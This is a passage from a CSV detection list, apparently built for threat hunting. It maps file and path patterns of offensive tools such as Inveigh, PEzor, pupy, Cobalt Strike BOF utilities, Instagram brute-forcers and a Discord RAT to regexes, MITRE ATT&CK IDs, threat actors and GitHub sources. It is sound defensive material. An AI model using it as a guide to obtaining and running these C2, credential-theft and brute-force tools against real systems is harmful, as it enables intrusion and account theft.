researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8089" "*/inline_syscall.git*",".{0,1000}\/inline_syscall\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8090" 
"*/inline_syscall/include/in_memory_init.hpp*",".{0,1000}\/inline_syscall\/include\/in_memory_init\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8091" "*/inline-exec/*.exe",".{0,1000}\/inline\-exec\/.{0,1000}\.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8092" "*/InlineWhispers*",".{0,1000}\/InlineWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","8093" "*/insta-bf.git*",".{0,1000}\/insta\-bf\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8094" "*/instabf.py*",".{0,1000}\/instabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8095" "*/instabrute.py*",".{0,1000}\/instabrute\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","8096" "*/instainsane.git*",".{0,1000}\/instainsane\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","8097" "*/instainsane.sh*",".{0,1000}\/instainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","8098" "*/install_elevated.py*",".{0,1000}\/install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8099" "*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 
- T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","8100" "*/install-sb.sh*",".{0,1000}\/install\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","8102" "*/InstallStager.exe*",".{0,1000}\/InstallStager\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","8103" "*/insTof.py*",".{0,1000}\/insTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8104" "*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - 
T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8105" "*/Intercepter-NG*.apk*",".{0,1000}\/Intercepter\-NG.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8110" "*/interesting-teamsmessages.csv*",".{0,1000}\/interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","8111" "*/internal/C2/*.go*",".{0,1000}\/internal\/C2\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","8112" "*/InternalMonologue.exe*",".{0,1000}\/InternalMonologue\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - 
T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8113" "*/Internals/Coff.cs*",".{0,1000}\/Internals\/Coff\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","8114" "*/InternetConnect_x64_Release.exe*",".{0,1000}\/InternetConnect_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8115" "*/Intranet penetration.cna*",".{0,1000}\/Intranet\spenetration\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8116" "*/Inveigh.exe*",".{0,1000}\/Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8117" "*/Inveigh.git*",".{0,1000}\/Inveigh\.git.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","8118" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","8119" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8120" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8121" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8122" "*/Inveigh.txt*",".{0,1000}\/Inveigh\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","8123" "*/Inveigh-Cleartext.txt*",".{0,1000}\/Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8124" "*/Inveigh-Cleartext.txt*",".{0,1000}\/Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8125" "*/Inveigh-FormInput.txt*",".{0,1000}\/Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8126" "*/Inveigh-FormInput.txt*",".{0,1000}\/Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8127" "*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8128" "*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","8129" "*/Inveigh-Log.txt*",".{0,1000}\/Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8130" "*/Inveigh-NTLMv1.txt*",".{0,1000}\/Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 
- T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8131" "*/Inveigh-NTLMv1.txt*",".{0,1000}\/Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8132" "*/Inveigh-NTLMv2.txt*",".{0,1000}\/Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#linux","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8133" 